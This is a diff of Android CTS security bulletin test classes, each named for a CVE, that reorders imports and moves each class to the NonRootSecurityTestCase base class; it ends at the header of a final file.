index e36c46f7974..a3f6307be76 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2044 extends SecurityTestCase {
+public class CVE_2019_2044 extends NonRootSecurityTestCase {
/**
* b/123701862
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java
index 16487a30037..ab2517dd82a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java
@@ -17,13 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.tradefed.device.ITestDevice;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2099 extends SecurityTestCase {
+public class CVE_2019_2099 extends NonRootSecurityTestCase {
/**
* b/123583388
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java
index 1f3552c31ec..6aee640344b 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java
@@ -17,13 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.tradefed.device.ITestDevice;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2115 extends SecurityTestCase {
+public class CVE_2019_2115 extends NonRootSecurityTestCase {
/**
* b/129768470
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java
index fe06a736bf6..cc9e24d61b1 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java
@@ -16,15 +16,16 @@
package android.security.cts;
-import com.android.tradefed.device.ITestDevice;
-
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2135 extends SecurityTestCase {
+public class CVE_2019_2135 extends NonRootSecurityTestCase {
/**
* b/125900276
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2136.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2136.java
index 91b20000241..cc50bb74e23 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2136.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2136.java
@@ -17,13 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.tradefed.device.ITestDevice;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2136 extends SecurityTestCase {
+public class CVE_2019_2136 extends NonRootSecurityTestCase {
/**
* b/132650049
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2178.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2178.java
index 223e7684b1c..492010b642c 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2178.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2178.java
@@ -18,12 +18,15 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
import android.platform.test.annotations.SecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2178 extends SecurityTestCase {
+public class CVE_2019_2178 extends NonRootSecurityTestCase {
/**
* b/124462242
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2180.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2180.java
index 31ab4ce1c17..ae8f7ed9f34 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2180.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2180.java
@@ -18,13 +18,14 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2180 extends SecurityTestCase {
+public class CVE_2019_2180 extends NonRootSecurityTestCase {
/**
* b/110899492
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java
index 15fab836dd0..b393d26dec6 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2206 extends SecurityTestCase {
+public class CVE_2019_2206 extends NonRootSecurityTestCase {
/**
* b/139188579
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java
index 7ce43c7ad1a..1951c67d3ce 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_2207 extends SecurityTestCase {
+public class CVE_2019_2207 extends NonRootSecurityTestCase {
/**
* b/124524315
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_9247.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_9247.java
index dbd7cc8426d..fe3ff06afdf 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_9247.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_9247.java
@@ -17,13 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.tradefed.device.ITestDevice;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2019_9247 extends SecurityTestCase {
+public class CVE_2019_9247 extends NonRootSecurityTestCase {
/**
* b/120426166
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java
index 58a24499b95..282a677f2ea 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java
@@ -17,13 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.tradefed.device.ITestDevice;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0006 extends SecurityTestCase {
+public class CVE_2020_0006 extends NonRootSecurityTestCase {
/**
* b/139738828
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0015.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0015.java
index 3aa0474a422..32a1e6ce404 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0015.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0015.java
@@ -23,13 +23,13 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0015 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2020_0015 extends NonRootSecurityTestCase {
@AppModeFull
@AsbSecurityTest(cveBugId = 139017101)
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0018.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0018.java
index 1207d1abd74..f2d934878bd 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0018.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0018.java
@@ -16,21 +16,25 @@
package android.security.cts;
+import static org.hamcrest.CoreMatchers.not;
+import static org.hamcrest.core.Is.is;
+import static org.junit.Assert.*;
+import static org.junit.Assume.*;
+import static org.junit.matchers.JUnitMatchers.containsString;
+
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.device.ITestDevice;
-import java.util.Scanner;
-import static org.hamcrest.core.Is.is;
-import static org.hamcrest.CoreMatchers.not;
-import static org.junit.Assert.*;
-import static org.junit.Assume.*;
-import static org.junit.matchers.JUnitMatchers.containsString;
+import java.util.Scanner;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0018 extends SecurityTestCase {
+public class CVE_2020_0018 extends NonRootSecurityTestCase {
/**
* b/139945049
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0034.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0034.java
index 6689459f68a..3d054f099d1 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0034.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0034.java
@@ -18,17 +18,17 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.compatibility.common.util.CrashUtils;
-
import java.util.Arrays;
-import java.util.ArrayList;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0034 extends SecurityTestCase {
+public class CVE_2020_0034 extends NonRootSecurityTestCase {
/**
* b/62458770
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java
index 3a87304a91f..8e913fa5e4c 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java
@@ -17,13 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.device.ITestDevice;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0037 extends SecurityTestCase {
+public class CVE_2020_0037 extends NonRootSecurityTestCase {
/**
* b/143106535
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java
index c197972af7a..32394824f74 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java
@@ -17,13 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.device.ITestDevice;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0038 extends SecurityTestCase {
+public class CVE_2020_0038 extends NonRootSecurityTestCase {
/**
* b/143109193
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java
index 76ce470724b..eaf41411dff 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java
@@ -17,13 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.device.ITestDevice;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0039 extends SecurityTestCase {
+public class CVE_2020_0039 extends NonRootSecurityTestCase {
/**
* b/143155861
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0072.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0072.java
index 7c00d842659..83e6b7a17e5 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0072.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0072.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0072 extends SecurityTestCase {
+public class CVE_2020_0072 extends NonRootSecurityTestCase {
/**
* b/147310271
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java
index 04d65f81dbc..c868d47c965 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java
@@ -20,15 +20,16 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import java.util.regex.Pattern;
-
-import org.junit.runner.RunWith;
import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0073 extends SecurityTestCase {
+public class CVE_2020_0073 extends NonRootSecurityTestCase {
/**
* b/147309942
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0226.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0226.java
index 614447c9a09..f523d472e03 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0226.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0226.java
@@ -17,12 +17,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0226 extends SecurityTestCase {
+public class CVE_2020_0226 extends NonRootSecurityTestCase {
/**
* b/150226994
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0241.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0241.java
index 237ed837a3f..a6609a4b26c 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0241.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0241.java
@@ -20,15 +20,16 @@ import android.platform.test.annotations.AsbSecurityTest;
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import java.util.regex.Pattern;
-
import org.junit.Test;
import org.junit.runner.RunWith;
+import java.util.regex.Pattern;
+
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0241 extends SecurityTestCase {
+public class CVE_2020_0241 extends NonRootSecurityTestCase {
/**
* b/151456667
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java
index 2ba62bfb697..59c7370e823 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java
@@ -17,13 +17,16 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
import com.android.compatibility.common.util.CrashUtils;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0243 extends SecurityTestCase {
+public class CVE_2020_0243 extends NonRootSecurityTestCase {
/**
* b/151644303
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0338.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0338.java
index 2bc254e0724..094eaea3d9c 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0338.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0338.java
@@ -19,7 +19,7 @@ package android.security.cts;
import android.platform.test.annotations.AppModeFull;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -27,7 +27,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0338 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2020_0338 extends NonRootSecurityTestCase {
@AppModeFull
@AsbSecurityTest(cveBugId = 123700107)
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java
index 12edb1af319..524f2d60abb 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java
@@ -20,18 +20,19 @@ import static org.junit.Assume.assumeFalse;
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
-
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
import java.util.Arrays;
import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0381 extends SecurityTestCase {
+public class CVE_2020_0381 extends NonRootSecurityTestCase {
/**
* b/150159669
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java
index 72765d64f1f..5bdf01708e5 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java
@@ -20,18 +20,19 @@ import static org.junit.Assume.assumeFalse;
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
-
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
import java.util.Arrays;
import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0383 extends SecurityTestCase {
+public class CVE_2020_0383 extends NonRootSecurityTestCase {
/**
* b/150160279
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java
index 34c66ded007..000e9705f98 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java
@@ -20,18 +20,19 @@ import static org.junit.Assume.assumeFalse;
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
-
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
import java.util.Arrays;
import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0384 extends SecurityTestCase {
+public class CVE_2020_0384 extends NonRootSecurityTestCase {
/**
* b/150159906
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java
index 0f9e7d27dae..b9ba1279d8a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java
@@ -20,18 +20,19 @@ import static org.junit.Assume.assumeFalse;
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
-
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.CrashUtils.Config.BacktraceFilterPattern;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
import java.util.Arrays;
import java.util.regex.Pattern;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0385 extends SecurityTestCase {
+public class CVE_2020_0385 extends NonRootSecurityTestCase {
/**
* b/150160041
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0420.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0420.java
index bff13f3d28e..eac03390ff4 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0420.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0420.java
@@ -18,12 +18,15 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
import android.platform.test.annotations.SecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0420 extends SecurityTestCase {
+public class CVE_2020_0420 extends NonRootSecurityTestCase {
/**
* b/162383705
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0448.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0448.java
index 27e202cf759..63c812854d2 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0448.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0448.java
@@ -18,7 +18,7 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
@@ -27,7 +27,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0448 extends StsExtraBusinessLogicHostTestBase {
+public class CVE_2020_0448 extends NonRootSecurityTestCase {
static final String TEST_APP = "CVE-2020-0448.apk";
static final String TEST_PKG = "android.security.cts.CVE_2020_0448";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0458.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0458.java
index 84b45a0304c..af8308029a5 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0458.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0458.java
@@ -18,13 +18,14 @@ package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0458 extends SecurityTestCase {
+public class CVE_2020_0458 extends NonRootSecurityTestCase {
/**
* b/160265164
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_11164.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_11164.java
index e3f6c262ad0..c9b448f598b 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_11164.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_11164.java
@@ -18,12 +18,15 @@ package android.security.cts;
import static org.junit.Assert.*;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_11164 extends SecurityTestCase {
+public class CVE_2020_11164 extends NonRootSecurityTestCase {
/**
* CVE-2020-11164
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_11173.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_11173.java
index a15335aa15c..a68d2e685c3 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_11173.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_11173.java
@@ -1,12 +1,15 @@
package android.security.cts;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_11173 extends SecurityTestCase {
+public class CVE_2020_11173 extends NonRootSecurityTestCase {
/**
* CVE-2020-11173
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_11282.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_11282.java
index 9664abff649..c1df440ed92 100644
